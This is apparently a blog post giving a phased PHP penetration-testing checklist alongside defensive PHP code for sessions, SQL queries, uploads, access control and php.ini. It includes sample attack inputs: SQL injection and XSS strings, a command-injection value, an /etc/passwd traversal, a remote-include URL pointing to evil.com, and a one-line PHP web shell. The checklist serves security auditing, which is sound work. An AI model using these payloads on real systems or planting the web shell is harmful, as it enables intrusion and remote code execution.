Monday, March 30, 2026 • Sachin Prajapati

PHP Security Audit Checklist: 30+ Tests Used by Penetration Testers

Below is a realistic penetration tester’s checklist (30+ tests) used when auditing websites built with PHP.
These checks are typically performed during web application penetration tests and security audits. They are based on methodologies such as those published by OWASP.

The checklist is grouped into phases used by professional pentesters.


1. Reconnaissance & Information Gathering

Goal: Identify technologies, entry points, and exposed information.

1. Identify server technology

Check headers for:

Server: Apache
X-Powered-By: PHP/8.x

Web servers often used:

  • Apache HTTP Server

  • Nginx


2. Determine PHP version

Use tools or header inspection.

Example:

X-Powered-By: PHP/8.1

Older versions may have known vulnerabilities.


3. Check for exposed phpinfo()

Attackers try:

/phpinfo.php

If accessible, it reveals:

  • server paths

  • modules

  • environment variables

  • configuration settings


4. Directory discovery

Test hidden directories:

/admin
/backup
/config
/uploads

Tools often used:

  • DirBuster

  • Gobuster


5. Backup file discovery

Look for:

config.php.bak
database.sql
site.zip

Backup files often expose credentials.


2. Authentication Testing

6. Brute-force login testing

Test weak credentials.

Example:

admin:admin
admin:password

Tools commonly used:

  • Hydra

  • Burp Suite


7. Check password policy

Test if passwords require:

  • minimum length

  • complexity

  • expiration


8. Account lockout testing

Verify if login attempts are limited.

Weak systems allow unlimited attempts.
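As an added example (not the author's code), a login routine that covers checks 6 to 8: password hashes instead of plaintext comparison, a minimum length rule, and a per-account attempt counter. $pdo is an assumed open PDO connection, and the columns password_hash, failed_attempts and locked_until are assumed to exist on the users table.

```php
<?php
// Added example, not code from the original post. $pdo is an assumed PDO
// connection; password_hash, failed_attempts, locked_until are assumed columns.
declare(strict_types=1);

const MAX_ATTEMPTS = 5;          // check 8: lock after this many failures
const LOCK_SECONDS = 15 * 60;    // lock duration

function login(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT id, password_hash, failed_attempts, locked_until FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Check 8: a locked account fails before the password is even examined.
    if ($row && $row['locked_until'] !== null && strtotime($row['locked_until']) > time()) {
        return false;
    }
    // Verify against a dummy hash when the user does not exist, so the response
    // time is the same for unknown and known usernames (dummy value constructed here).
    $hash = $row['password_hash'] ?? password_hash('placeholder-not-a-real-password', PASSWORD_DEFAULT);
    $ok = password_verify($password, $hash);

    if ($row && $ok) {
        $pdo->prepare('UPDATE users SET failed_attempts = 0, locked_until = NULL WHERE id = ?')
            ->execute([$row['id']]);
        return true;
    }
    if ($row) {
        // Check 6/8: count the failure and lock the account once the limit is hit.
        $attempts = (int) $row['failed_attempts'] + 1;
        $lock = $attempts >= MAX_ATTEMPTS ? date('Y-m-d H:i:s', time() + LOCK_SECONDS) : null;
        $pdo->prepare('UPDATE users SET failed_attempts = ?, locked_until = ? WHERE id = ?')
            ->execute([$attempts, $lock, $row['id']]);
    }
    return false;
}

// Check 7: enforce a minimum length and reject the obvious defaults from check 6
// at registration; password_hash() handles salting and work factor.
function validateNewPassword(string $password): bool
{
    return strlen($password) >= 12 && !in_array($password, ['password', 'admin', '123456'], true);
}
```

Locking only the targeted account still allows a password-spraying style of attempt across many usernames, so pair this with per-IP rate limiting at the web server or WAF.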


9. Session fixation testing

Check if session ID changes after login.

If not, attackers may hijack sessions.


10. Session timeout testing

Sessions should expire after inactivity.

Example:

30 minutes inactivity timeout

3. Session Management Testing

11. Cookie security flags

Check cookies for:

HttpOnly
Secure
SameSite

These protect sessions.


12. Session ID randomness

Session IDs should be unpredictable.

Weak example:

SESSIONID=12345

Strong example:

SESSIONID=1a7f93e2c6d8

13. Session hijacking test

Attempt to reuse session tokens from another browser.
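One way to satisfy checks 9 to 13 in PHP, as an added example that is not the author's code: cookie flags set before the session starts, an inactivity timeout, ID regeneration at login, and a client binding that makes a copied cookie less useful. The 30-minute limit is the value from check 10; loginUser() and sessionMatchesClient() are illustrative names.

```php
<?php
// Added example (not code from the original post): session hardening for checks 9-13.
declare(strict_types=1);

const INACTIVITY_LIMIT = 30 * 60;   // 30 minutes, as in check 10

// Check 11: cookie flags must be set before session_start() creates the cookie.
session_set_cookie_params([
    'lifetime' => 0,          // browser-session cookie, not persisted to disk
    'path'     => '/',
    'secure'   => true,       // only sent over HTTPS
    'httponly' => true,       // not readable from JavaScript
    'samesite' => 'Strict',   // not sent on cross-site requests
]);
session_start();

// Check 10: drop the session data and issue a new ID after inactivity.
if (isset($_SESSION['last_seen']) && time() - $_SESSION['last_seen'] > INACTIVITY_LIMIT) {
    $_SESSION = [];
    session_regenerate_id(true);
}
$_SESSION['last_seen'] = time();

// Check 9: regenerate the ID at the moment of authentication, so an ID that an
// attacker fixed before login is never promoted to an authenticated session.
function loginUser(int $userId): void
{
    session_regenerate_id(true);   // true = delete the old session file as well
    $_SESSION['user_id']   = $userId;
    $_SESSION['last_seen'] = time();
}

// Check 13: bind the session to the client so that a token replayed from a
// different browser is rejected unless the attacker also matches the User-Agent.
function sessionMatchesClient(): bool
{
    $ua = hash('sha256', $_SERVER['HTTP_USER_AGENT'] ?? '');
    if (!isset($_SESSION['ua_hash'])) {
        $_SESSION['ua_hash'] = $ua;
        return true;
    }
    return hash_equals($_SESSION['ua_hash'], $ua);
}

// Check 12: PHP generates its own random IDs; keep session.use_strict_mode=1 so
// an ID supplied by the client that the server never issued is not accepted.
```

The User-Agent binding is a weak signal on its own (it is attacker-controlled), so treat it as defence in depth behind the HttpOnly and Secure flags rather than as the primary control.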


4. Input Validation Testing

14. SQL Injection testing

Test input fields like:

' OR '1'='1

If successful, the WHERE clause always evaluates to true and the query returns rows it should not.

Example vulnerable query:

$query = "SELECT * FROM users WHERE username='$user'";
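The vulnerable query above beside its parameterised form, as an added example that is not the author's code. It runs against a constructed in-memory SQLite table (the pdo_sqlite extension is assumed) so the difference can be observed without a real database.

```php
<?php
// Added example (not code from the original post): check 14, vulnerable and fixed.
declare(strict_types=1);

// VULNERABLE: $user is pasted into the SQL text, so the check-14 input rewrites
// the WHERE clause instead of being treated as a username value.
function findUserUnsafe(PDO $pdo, string $user): array
{
    $query = "SELECT * FROM users WHERE username='$user'";
    return $pdo->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: a prepared statement sends the SQL and the value separately, so the
// quote characters in the input never reach the SQL parser as syntax.
function findUserSafe(PDO $pdo, string $user): array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE username = :username');
    $stmt->execute([':username' => $user]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database (pdo_sqlite assumed).
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$pdo->exec("INSERT INTO users (username, password_hash) VALUES ('alice', 'x'), ('bob', 'y')");

$payload = "' OR '1'='1";   // the test input from check 14
// The unsafe function returns every user; the safe one returns no rows,
// because no account is literally named ' OR '1'='1.
printf("unsafe: %d rows, safe: %d rows\n",
    count(findUserUnsafe($pdo, $payload)), count(findUserSafe($pdo, $payload)));
```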

15. Cross-Site Scripting (XSS)

Inject JavaScript:

<script>alert(1)</script>

If it executes, the site is vulnerable.
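Output encoding that renders the check-15 payload as text, as an added example that is not the author's code. The helpers e() and eJs() are illustrative names; the input value is constructed.

```php
<?php
// Added example (not code from the original post): context-aware output encoding for check 15.
declare(strict_types=1);

// Encode for an HTML body or a quoted attribute value.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encode for a value placed inside a <script> block: JSON with the characters
// that could close the script or open a tag escaped as \uXXXX sequences.
function eJs(string $value): string
{
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

$name = '<script>alert(1)</script>';   // constructed: the input from check 15

// VULNERABLE: raw reflection puts the payload into the page as markup.
$vulnerable = "<p>Hello $name</p>";

// FIXED: the same value, encoded for the context it lands in.
$safeHtml = '<p>Hello ' . e($name) . '</p>';
$safeAttr = '<input value="' . e($name) . '">';
$safeJs   = '<script>var name = ' . eJs($name) . ';</script>';

// None of the encoded outputs contain a literal "<script" any more.
foreach ([$safeHtml, $safeAttr, $safeJs] as $out) {
    if (stripos($out, '<script>alert') !== false) {
        throw new LogicException('encoding failed');
    }
}
```

Encoding belongs at output time, per context; sanitising on input cannot know whether the value will later be placed in HTML, an attribute or a script.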


16. Command injection testing

Try input like:

; ls

If the server executes it, command injection exists.


17. File inclusion testing

Test parameters like:

?page=../../../../etc/passwd

This checks for Local File Inclusion (LFI).


18. Remote file inclusion testing

Example:

?page=http://evil.com/shell.php

This works only if the server is misconfigured to allow remote includes (see allow_url_include in php.ini).
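For checks 17 and 18, the usual fix is to stop treating the page parameter as a path at all. Added example, not the author's code; the pages/ directory and its file names are assumptions.

```php
<?php
// Added example (not code from the original post): replacing include($_GET['page'])
// with an allow-list, which closes both LFI (check 17) and RFI (check 18).
declare(strict_types=1);

// VULNERABLE: the request parameter becomes a filesystem path. Traversal
// sequences reach the filesystem, and with allow_url_include on, URLs do too.
function renderPageUnsafe(string $page): void
{
    include $page . '.php';
}

// FIXED: the parameter selects a key; only values present in the map can ever
// reach include(), so ../ sequences and http:// prefixes are simply unknown keys.
const PAGES = [
    'home'    => 'pages/home.php',     // assumed files
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function renderPage($page): void
{
    // is_string() rejects ?page[]=x, which would otherwise be an array.
    if (!is_string($page) || !isset(PAGES[$page])) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include __DIR__ . '/' . PAGES[$page];
}

renderPage($_GET['page'] ?? 'home');
```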


19. Parameter tampering

Modify request parameters.

Example:

price=100 → price=1

Check if server validates values.


5. File Upload Testing

20. Upload PHP shell

Try uploading:

shell.php

Example test payload:

<?php system($_GET['cmd']); ?>

21. Upload double extensions

Example:

shell.php.jpg

Some servers execute it as PHP.


22. MIME type bypass

Change request header:

Content-Type: image/jpeg

even when the uploaded file is actually .php.


23. Upload large files

Test server limits.

Example:

1GB upload attempt

This may cause denial of service.
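Upload handling that addresses checks 20 to 23 together, as an added example that is not the author's code: type sniffed from the file bytes rather than the Content-Type header, the original filename discarded, a server-chosen extension, a size cap, and storage outside the web root. UPLOAD_DIR and the form field name upload are assumptions.

```php
<?php
// Added example (not code from the original post): hardened upload handling, checks 20-23.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';   // assumed; a directory the web server does not serve
const MAX_BYTES  = 2 * 1024 * 1024;      // 2 MB; also set upload_max_filesize/post_max_size in php.ini (check 23)
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png'];   // sniffed type => stored extension

function storeUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or exceeded the configured size limit');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Checks 20 and 22: the client's Content-Type and filename are untrusted;
    // determine the type from the bytes that actually arrived.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']) ?: '';
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('type not allowed: ' . $mime);
    }

    // Check 21: the original name (e.g. shell.php.jpg) is never used; the stored
    // name is random and carries exactly one extension chosen by the server.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);   // not executable, not world-readable
    return $name;
}

if (isset($_FILES['upload'])) {
    try {
        echo 'stored as ', storeUpload($_FILES['upload']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'upload rejected';
        error_log('upload rejected: ' . $e->getMessage());
    }
}
```

Type sniffing can be fooled by polyglot files, so the controls that really matter are the server-chosen extension and a storage location the PHP handler never executes from.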


6. Access Control Testing

24. Privilege escalation

Attempt to access admin pages without authentication:

/admin
/admin/dashboard


25. Insecure direct object reference (IDOR)

Example:

/user?id=1001

Change to:

/user?id=1002

If it loads another user's data, the endpoint is vulnerable.


26. Forced browsing

Access restricted pages directly.

Example:

/admin/deleteUser.php
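Object-level and function-level checks for the /user?id=... and /admin cases from checks 24 to 26, as an added example that is not the author's code. $pdo is an assumed open PDO connection and a role column on users is assumed.

```php
<?php
// Added example (not code from the original post): access control for checks 24-26.
// $pdo is an assumed, already-open PDO connection.
declare(strict_types=1);

session_start();

// Checks 24 and 26: every protected script verifies the session itself.
// Not linking to /admin/deleteUser.php is not access control.
function requireLogin(): int
{
    if (empty($_SESSION['user_id'])) {
        http_response_code(401);
        exit('login required');
    }
    return (int) $_SESSION['user_id'];
}

// Call requireRole($pdo, $me, 'admin') at the top of every /admin script.
function requireRole(PDO $pdo, int $userId, string $role): void
{
    $stmt = $pdo->prepare('SELECT role FROM users WHERE id = ?');
    $stmt->execute([$userId]);
    if ($stmt->fetchColumn() !== $role) {
        http_response_code(403);
        exit('forbidden');
    }
}

// Check 25: the requested id is compared with the authenticated identity
// instead of being trusted as supplied in the URL.
function loadProfile(PDO $pdo, int $currentUser, int $requestedId): ?array
{
    if ($requestedId !== $currentUser) {
        return null;   // an admin path would go through requireRole() first
    }
    $stmt = $pdo->prepare('SELECT id, username, email FROM users WHERE id = ?');
    $stmt->execute([$requestedId]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

$me = requireLogin();
$profile = loadProfile($pdo, $me, (int) ($_GET['id'] ?? 0));
if ($profile === null) {
    http_response_code(403);   // same response whether or not the other id exists
    exit('forbidden');
}
```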

7. Configuration Testing

27. php.ini security check

Verify:

  • display_errors

  • allow_url_include

  • disable_functions

in php.ini.
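A runtime audit of the settings from check 27 plus a few related ones, as an added example that is not the author's code. It uses ini_get() so it reports the values the running PHP actually sees, including overrides from .htaccess or the FPM pool; the expected values are the hardened ones and allow_url_fopen=0 assumes the application does not need to fetch URLs.

```php
<?php
// Added example (not code from the original post): php.ini audit for check 27.
// Run once from the deployed application, then delete it.
declare(strict_types=1);

// setting => [expected value, why it matters]
$checks = [
    'display_errors'          => ['0', 'stack traces and paths must not reach clients (checks 29, 34)'],
    'display_startup_errors'  => ['0', 'same, for errors raised during startup'],
    'log_errors'              => ['1', 'errors go to the log instead'],
    'allow_url_include'       => ['0', 'blocks remote file inclusion (check 18)'],
    'allow_url_fopen'         => ['0', 'blocks URL wrappers in file functions (assumes the app needs none)'],
    'expose_php'              => ['0', 'removes the X-Powered-By version header (checks 1-2)'],
    'session.cookie_httponly' => ['1', 'session cookie not readable by scripts (check 11)'],
    'session.cookie_secure'   => ['1', 'session cookie only over HTTPS (check 11)'],
    'session.use_strict_mode' => ['1', 'rejects session IDs the server never issued (check 9)'],
];

function auditIni(array $checks): array
{
    $findings = [];
    foreach ($checks as $key => [$expected, $why]) {
        $actual = ini_get($key);   // "", "0", "1", "On", "Off" or false, depending on how it was set
        $normalised = in_array(strtolower((string) $actual), ['1', 'on', 'true', 'yes'], true) ? '1' : '0';
        if ($normalised !== $expected) {
            $findings[$key] = ['actual' => $actual, 'expected' => $expected, 'why' => $why];
        }
    }
    // disable_functions is a list, not a flag: report the execution functions still enabled.
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $stillOn  = array_diff(['exec', 'shell_exec', 'system', 'passthru', 'proc_open', 'popen'], $disabled);
    if ($stillOn !== []) {
        $findings['disable_functions'] = ['actual' => implode(',', $stillOn) . ' enabled',
            'expected' => 'disabled', 'why' => 'limits command execution if code is injected (check 16)'];
    }
    return $findings;
}

foreach (auditIni($checks) as $key => $f) {
    printf("%-24s actual=%-8s expected=%s  %s\n", $key, var_export($f['actual'], true), $f['expected'], $f['why']);
}
```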


28. Directory listing test

Try accessing:

/uploads/

If files are listed, attackers may download them.


29. Check debug modes

Developers often leave debug enabled.

Frameworks like:

  • Laravel

  • Symfony

may reveal stack traces.


30. Sensitive file exposure

Check for:

.env
.git
composer.json

These may contain secrets.


8. SSL/TLS Security Testing

31. HTTPS enforcement

Check if HTTP redirects to HTTPS.


32. TLS configuration

Verify encryption using tools like:

  • SSL Labs


9. Logging & Monitoring

33. Log injection

Test if attackers can manipulate logs.

Example input:

admin\nhacked
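Neutralising that input before it reaches a line-based log, as an added example that is not the author's code. logSafe() and logFailedLogin() are illustrative names; the IP address is a constructed documentation value.

```php
<?php
// Added example (not code from the original post): log injection defence for check 33.
declare(strict_types=1);

// Line-based logs are parsed one line at a time, so CR and LF inside user data
// would let an attacker append a forged entry. Escape every control character
// and cap the field length before writing.
function logSafe(string $value, int $max = 200): string
{
    $value = substr($value, 0, $max);   // byte-based cap; adequate for a log field
    // Each ASCII control character (including \r and \n) becomes its \xNN form.
    return preg_replace_callback('/[\x00-\x1F\x7F]/', fn ($m) => sprintf('\\x%02X', ord($m[0])), $value);
}

function logFailedLogin(string $username, string $ip): void
{
    // Quoting the field keeps its boundaries unambiguous even with spaces inside.
    error_log(sprintf('[%s] failed login user="%s" ip=%s', date('c'), logSafe($username), logSafe($ip)));
}

// Constructed input from check 33: the newline is written as \x0A, so the entry stays one line.
logFailedLogin("admin\nhacked", '203.0.113.5');
```

Structured (JSON) logging removes the problem at the source, since the encoder escapes newlines for you; the escaping above is the fallback for plain-text logs.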

34. Error handling testing

Trigger errors intentionally.

Example:

?id='

Check if sensitive information appears.


Example Pentesting Workflow

A professional pentester typically performs tests in this order:

1. Reconnaissance
2. Identify technologies
3. Discover endpoints
4. Test authentication
5. Test session management
6. Test input validation
7. Test file uploads
8. Test access control
9. Test configuration security
10. Evaluate encryption and logging

What Pentesters Use During PHP Audits

Common tools include:

  • Burp Suite

  • OWASP ZAP

  • Nikto

  • Gobuster

  • SQLmap

These automate vulnerability testing.


Final Concept

A secure PHP application requires protection in three layers:

1️⃣ Secure code
2️⃣ Hardened PHP configuration
3️⃣ Secure server setup

Penetration testing helps identify weaknesses before attackers exploit them.